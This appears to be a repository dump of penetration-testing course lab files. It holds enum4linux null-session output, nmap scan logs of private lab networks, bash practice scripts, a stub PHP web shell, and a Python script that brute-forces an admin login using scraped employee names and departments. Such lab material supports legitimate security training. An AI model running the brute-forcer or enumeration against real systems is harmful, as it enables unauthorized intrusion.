546) has member: ELS-WINXP\\Guest\n\n[+] Getting local groups:\ngroup:[HelpServicesGroup] rid:[0x3e9]\n\n[+] Getting local group memberships:\nGroup 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\\SUPPORT_388945a0\n\n[+] Getting domain groups:\ngroup:[None] rid:[0x201]\n\n[+] Getting domain group memberships:\nGroup 'None' (RID: 513) has member: ELS-WINXP\\Administrator\nGroup 'None' (RID: 513) has member: ELS-WINXP\\Guest\nGroup 'None' (RID: 513) has member: ELS-WINXP\\HelpAssistant\nGroup 'None' (RID: 513) has member: ELS-WINXP\\SUPPORT_388945a0\nGroup 'None' (RID: 513) has member: ELS-WINXP\\eLS\nGroup 'None' (RID: 513) has member: ELS-WINXP\\netadmin\nGroup 'None' (RID: 513) has member: ELS-WINXP\\Frank\n\n ========================================================================= \n| Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) |\n ========================================================================= \n[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.\n[I] Found new SID: S-1-5-32\n[I] Found new SID: S-1-5-21-823518204-2025429265-839522115\n[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''\n[+] Enumerating users using SID S-1-5-32 and logon username '', password ''\n\n =============================================== \n| Getting printer info for 192.168.99.162 |\n =============================================== \nNo printers returned.\n\n\nenum4linux complete on Sun Feb 21 17:25:39 2021\n\n" }, { "path": "ine-labs/null-session/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Sun Feb 21 17:08:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report for 192.168.99.100\nHost is up (0.00023s latency).\nAll 1000 scanned ports on 192.168.99.100 are closed\n\nNmap scan report for 192.168.99.162\nHost is up (0.058s latency).\nNot shown: 997 closed ports\nPORT STATE SERVICE VERSION\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds\nService Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Sun Feb 21 17:08:41 2021 -- 2 IP addresses (2 hosts up) scanned in 8.95 seconds\n" }, { "path": "ine-labs/practice/hello.php", "content": "\n \n Test PHP\n \n\n \n Hello World!

'; ?>\n \n\n" }, { "path": "ine-labs/practice/index.html", "content": "\n \n Test PHP\n \n\n \n

\n Welcome to my custom web server!\n

\n \n\n" }, { "path": "ine-labs/practice/my-ls.sh", "content": "#!/bin/bash\n\nfor i in $(ls); do\n\techo \"item: $i\"\ndone\n" }, { "path": "ine-labs/practice/script.sh", "content": "#!/bin/bash\n\nx=444\ny=321\n\nif [ \"$x\" -eq \"$y\" ]; then\n\techo \"The values are equal!\";\nelif [ \"$x\" -lt \"$y\" ]; then\n\techo \"$x is less than $y\"\nelse\n\techo \"$x is greater than $y\"\nfi\n" }, { "path": "ine-labs/practice/sequences.sh", "content": "#!/bin/bash\n\necho \"Two ways to iterate over a sequence of numbers!\"\n\necho \"option 1: use the seq command\"\nfor i in $(seq 1 10); do\n\techo \"$i\";\ndone\n\necho \"option 2: use built-in braces {1..10}\"\nfor i in {1..10}; do\n\techo \"$i\";\ndone\n\n" }, { "path": "ine-labs/practice/shell.php", "content": "\n \n Simple PHP Shell\n \n\n \n \n
\n \n \n \n\n \n \n \n\n" }, { "path": "ine-labs/python-assisted-exploitation/brute-forcer.py", "content": "from bs4 import BeautifulSoup\nimport requests\n\ndef get_html(url):\n\tresponse = requests.get(url)\n\thtml = response.text\n\treturn html\n\ndef parse_ids(html, id_name):\n\t\"\"\"\n\tGiven HTML code, returns a list of values that have the id `id_name`. \n\t\"\"\"\n\tresult = []\n\tsoup = BeautifulSoup(html, \"html.parser\")\n\tfor item in soup.find_all(id=id_name):\n\t\tresult.append(item.contents[0])\n\n\t# Remove an duplicate entries\n\tresult = list(set(result))\n\treturn result\n\t\n\ndef attack():\n\t# Scrape website for employee names and departments\n\thtml = get_html(\"http://172.16.120.120\")\n\ttarget = \"http://172.16.120.120/admin.php\"\n\tnames = parse_ids(html, \"name\")\n\tdepartments = parse_ids(html, \"department\")\n\n\t# Attempt to login to \"Admin Area\" with name:department credential pair\n\tfor name in names:\n\t\tfor department in departments:\n\t\t\tresponse = requests.get(target, auth=(name, department))\n\n\t\t\tif response.status_code != 401:\n\t\t\t\tprint(f\"Found successful login {name}:{department}\")\n\t\t\t\treturn\n\n\nif __name__ == \"__main__\":\n\tattack()\n" }, { "path": "ine-labs/scanning-and-os-fingerprinting/fping_scan.txt", "content": "10.142.111.1\n10.142.111.6\n10.142.111.48\n10.142.111.96\n10.142.111.99\n10.142.111.100\n10.142.111.240\n" }, { "path": "ine-labs/scanning-and-os-fingerprinting/nmap_ping_scan.txt", "content": "# Nmap 7.91 scan initiated Wed Feb 17 22:20:54 2021 as: nmap -sn -oN nmap_ping_scan.txt 10.142.111.*\nNmap scan report for 10.142.111.1\nHost is up (0.056s latency).\nNmap scan report for 10.142.111.6\nHost is up (0.057s latency).\nNmap scan report for 10.142.111.48\nHost is up (0.057s latency).\nNmap scan report for 10.142.111.96\nHost is up (0.056s latency).\nNmap scan report for 10.142.111.99\nHost is up (0.056s latency).\nNmap scan report for 10.142.111.100\nHost is up (0.056s latency).\nNmap scan report for 10.142.111.213\nHost is up (0.060s latency).\nNmap scan report for 10.142.111.240\nHost is up (0.024s latency).\n# Nmap done at Wed Feb 17 22:20:57 2021 -- 256 IP addresses (8 hosts up) scanned in 3.23 seconds\n" }, { "path": "ine-labs/scanning-and-os-fingerprinting/nmap_syn_scan.txt", "content": "# Nmap 7.91 scan initiated Wed Feb 17 22:22:53 2021 as: nmap -sS -iL fping_scan.txt -oN nmap_syn_scan.txt\nNmap scan report for 10.142.111.1\nHost is up (0.057s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE\n22/tcp open ssh\n53/tcp open domain\n80/tcp open http\nMAC Address: 00:50:56:A0:23:42 (VMware)\n\nNmap scan report for 10.142.111.6\nHost is up (0.055s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE\n22/tcp open ssh\nMAC Address: 00:50:56:A0:B1:71 (VMware)\n\nNmap scan report for 10.142.111.48\nHost is up (0.056s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE\n135/tcp open msrpc\n139/tcp open netbios-ssn\n445/tcp open microsoft-ds\n3389/tcp open ms-wbt-server\nMAC Address: 00:50:56:A0:57:E5 (VMware)\n\nNmap scan report for 10.142.111.96\nHost is up (0.057s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE\n80/tcp open http\nMAC Address: 00:50:56:A0:1C:4F (VMware)\n\nNmap scan report for 10.142.111.99\nHost is up (0.063s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE\n22/tcp open ssh\n53/tcp open domain\n80/tcp open http\nMAC Address: 00:50:56:A0:E5:3E (VMware)\n\nNmap scan report for 10.142.111.100\nHost is up (0.056s latency).\nAll 1000 scanned ports on 10.142.111.100 are closed\nMAC Address: 00:50:56:A0:1C:4F (VMware)\n\nNmap scan report for 10.142.111.240\nHost is up (0.000020s latency).\nAll 1000 scanned ports on 10.142.111.240 are closed\n\n# Nmap done at Wed Feb 17 22:23:07 2021 -- 7 IP addresses (7 hosts up) scanned in 14.32 seconds\n" }, { "path": "ine-labs/scanning-and-os-fingerprinting/nmap_version_and_os.txt", "content": "# Nmap 7.91 scan initiated Wed Feb 17 22:24:04 2021 as: nmap -O -sV -iL fping_scan.txt -oN nmap_version_and_os.txt\nNmap scan report for 10.142.111.1\nHost is up (0.055s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)\n53/tcp open domain dnsmasq 2.55\n80/tcp open http lighttpd 1.4.29\nMAC Address: 00:50:56:A0:23:42 (VMware)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|specialized|media device\nRunning (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), FreeBSD 7.X|9.X (87%), Comau embedded (86%), Apple Apple TV 5.X (85%)\nOS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1\nAggressive OS guesses: OpenBSD 4.3 (94%), FreeBSD 7.0-RELEASE (87%), Comau C4G robot control unit (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.1 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 1 hop\nService Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd\n\nNmap scan report for 10.142.111.6\nHost is up (0.054s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\nMAC Address: 00:50:56:A0:27:7E (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/17%OT=22%CT=1%CU=39056%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O\nOS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6\nOS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 10.142.111.48\nHost is up (0.056s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE VERSION\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds\n3389/tcp open ms-wbt-server Microsoft Terminal Services\nMAC Address: 00:50:56:A0:57:E5 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/17%OT=135%CT=1%CU=39985%PV=Y%DS=1%DC=D%G=Y%M=005056%\nOS:TM=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%CI=I%II=I\nOS:%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4=\nOS:M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF%W\nOS:3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC=\nOS:N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S\nOS:%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NNS\nOS:%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=\nOS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T\nOS:7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN=\nOS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)\n\nNetwork Distance: 1 hop\nService Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp\n\nNmap scan report for 10.142.111.96\nHost is up (0.055s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE VERSION\n80/tcp open http Apache httpd 2.2.22 ((Debian))\nMAC Address: 00:50:56:A0:1C:4F (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/17%OT=80%CT=1%CU=40537%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O\nOS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6\nOS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nNetwork Distance: 1 hop\n\nNmap scan report for 10.142.111.99\nHost is up (0.056s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)\n53/tcp open domain dnsmasq 2.55\n80/tcp open http lighttpd 1.4.29\nMAC Address: 00:50:56:A0:E5:3E (VMware)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|specialized|media device\nRunning (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), Comau embedded (86%), FreeBSD 7.X|9.X (86%), Apple Apple TV 5.X (85%)\nOS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1\nAggressive OS guesses: OpenBSD 4.3 (94%), Comau C4G robot control unit (86%), FreeBSD 7.0-RELEASE (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 1 hop\nService Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd\n\nNmap scan report for 10.142.111.100\nHost is up (0.055s latency).\nAll 1000 scanned ports on 10.142.111.100 are closed\nMAC Address: 00:50:56:A0:1C:4F (VMware)\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 1 hop\n\nNmap scan report for 10.142.111.240\nHost is up (0.000058s latency).\nAll 1000 scanned ports on 10.142.111.240 are closed\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 0 hops\n\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Wed Feb 17 22:24:38 2021 -- 7 IP addresses (7 hosts up) scanned in 35.93 seconds\n" }, { "path": "scripts/eEnum.sh", "content": "#!/bin/bash\n# A wrapper for fping and nmap to help automate the host enumeration.\n\nTARGET=$1\nHOST_FILE=\"alive_hosts.txt\"\nOUT_FILE=\"nmap_scan.txt\"\n\nprint_usage()\n{\n\techo \"Usage: $0 \"\n}\n\nscan()\n{\n\techo \"++ starting fping scan ++\"\n\tfping -a -g $TARGET 2>/dev/null | tee $HOST_FILE;\n\t\n\techo \"\"\n\n\techo \"++ starting nmap scan ++\"\n\tsudo nmap -p- -A -T4 -iL $HOST_FILE -oN $OUT_FILE;\n}\n\nif [ -z \"$TARGET\" ]; then\n\tprint_usage\n\texit 1\nfi\n\nscan\n" } ]